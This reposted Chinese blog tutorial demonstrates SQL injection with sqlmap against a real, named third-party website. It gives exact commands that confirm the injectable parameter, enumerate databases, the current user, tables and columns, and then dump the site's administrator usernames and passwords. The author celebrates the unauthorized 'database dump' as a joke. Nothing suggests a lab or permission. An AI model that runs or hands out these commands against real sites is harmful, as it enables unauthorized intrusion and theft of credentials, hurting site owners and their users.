转载:sqlmap的应用实战
原文鏈接:https://blog.csdn.net/vala0901/article/details/71548954
有幸在kali中文網(wǎng)上查看了很多大神寫的sqlmap的教程,其中還在大神的文章里找到了一個(gè)悲催的網(wǎng)站www.bible-history.com/,所以就按照前人總結(jié),給這個(gè)悲催的網(wǎng)站脫褲了。。。。下面詳細(xì)的講一下怎么給網(wǎng)站脫褲,啊,不,是拖庫(kù)。。。。。
1.首先要知道可以注入的網(wǎng)址是什么
? ? http://www.bible-history.com/subcat.php?id=2
2.接著就可以針對(duì)這個(gè)網(wǎng)址來(lái)檢測(cè)能不能注入,以及查看它的所有數(shù)據(jù)庫(kù)列表了
? sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --dbs ?(注意:dbs前面是兩個(gè)橫杠)
?
注入的結(jié)果表示:
(1)注入?yún)?shù)id為GET注入,注入類型有四種,分別是:boolean-based blind/error-based/time-based blind/union query
(2)web應(yīng)用程序技術(shù)為:Apache ?PHP
(3)數(shù)據(jù)庫(kù)類型:MySQL
(4)畫紅圈的是網(wǎng)址所有的數(shù)據(jù)庫(kù)名單
其中可能有你輸入[Y/N]的,統(tǒng)統(tǒng)回車解決吧。
?
3.這時(shí),我們發(fā)現(xiàn)這個(gè)網(wǎng)址存在注入,并且拿到了所有數(shù)據(jù)庫(kù)名單。我們決定查看web當(dāng)前使用的數(shù)據(jù)庫(kù)
? sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-db
紅線畫出的就是當(dāng)前使用的數(shù)據(jù)庫(kù):bible_history,一會(huì)我們會(huì)針對(duì)這個(gè)數(shù)據(jù)庫(kù)下手。。。
4.探測(cè)web數(shù)據(jù)庫(kù)使用的賬號(hào)
? sqlmap -u "http://www.bible-history.com/subcat.php?id=2" --current-user
可見(jiàn)當(dāng)前的數(shù)據(jù)庫(kù)使用賬戶為:bho@localhost
?
5.下面我們來(lái)探測(cè)bible_history這個(gè)數(shù)據(jù)庫(kù)里的所有表
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history --tables
其中:
(1)D指出數(shù)據(jù)庫(kù)名字
(2)tables列出表
?
6.下面我想探測(cè)的是administrators這個(gè)表的列
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators --columns
其中:
(1)T指定要列出字段的表
(2)columns列出列
?
7.表中字段明顯拿到了。。。。下面一步還用說(shuō)么?果斷脫褲。。。。好開(kāi)心。。。。
sqlmap -u "http://www.bible-history.com/subcat.php?id=2" -D bible_history -T administrators -C admin_id,admin_username,admin_password --dump
成功!!!
(PS:自從逛了大神技術(shù)貼,就再也不能好好說(shuō)“拖庫(kù)”了。。。滿腦子都是給web脫褲。。。。我天朝的男程序員們就是如此悶騷闊愛(ài))認(rèn)真臉。。。
總結(jié)
以上是生活随笔為你收集整理的转载:sqlmap的应用实战的全部?jī)?nèi)容,希望文章能夠幫你解決所遇到的問(wèn)題。
- 上一篇: 转载:python3 安装pycrypt
- 下一篇: CTF-RSA-tool 安装全过程